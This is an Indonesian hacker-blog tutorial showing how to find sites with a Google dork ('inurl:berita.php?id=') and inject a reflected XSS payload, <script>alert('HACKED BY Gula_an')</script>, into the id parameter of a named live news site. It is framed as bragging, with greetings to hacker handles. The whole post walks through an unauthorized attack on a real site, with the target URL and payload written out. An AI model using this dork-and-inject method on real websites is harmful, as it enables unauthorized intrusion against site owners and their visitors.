Home » Uncategories » [TUT] XSS dengan Pop-up

[TUT] XSS dengan Pop-up

Hai para reader ..
kali ini gue pengen ngajarin cara XSS dengan POP-UP javascript ..

Langsung aja ..

Pertama gue melakukan Dorking
dengan Dork inurl:berita.php?id=

Gue menemukan target yaitu

http://syahrini.sextgem.com/berita.php?id=Giliran+Harga+Kedelai+Beranjak+Naik

Setelah itu gue coba memasukkan single quote ( ' ) pada akhir parameter id= untuk mengecek inject pointnya ..

http://syahrini.sextgem.com/berita.php?id=Giliran+Harga+Kedelai+Beranjak+Naik'

Dan ternyata bisa di XSS

Kemudian gue masukin kode html

<script>alert('HACKED+BY+Gula_an')</script>

Pada parameter id=

dan hasilnya seperti ini

http://syahrini.sextgem.com/berita.php?id=<script>alert('HACKED+BY+Gula_an')</script>

..*..

oke itu dia tadi Metode XSS dengan pop-up

Terimakasih banyak udah baca artikel ini .. XOXO

Greet: Gula_an - Zhee614 - Mr.Landak - ID10T - and You

0 Response to "[TUT] XSS dengan Pop-up"

Post a Comment

Boleh deh bagi keripik pedasnya , tapi sekalian sama air kerannya ya :)

Subscribe to: Post Comments (Atom)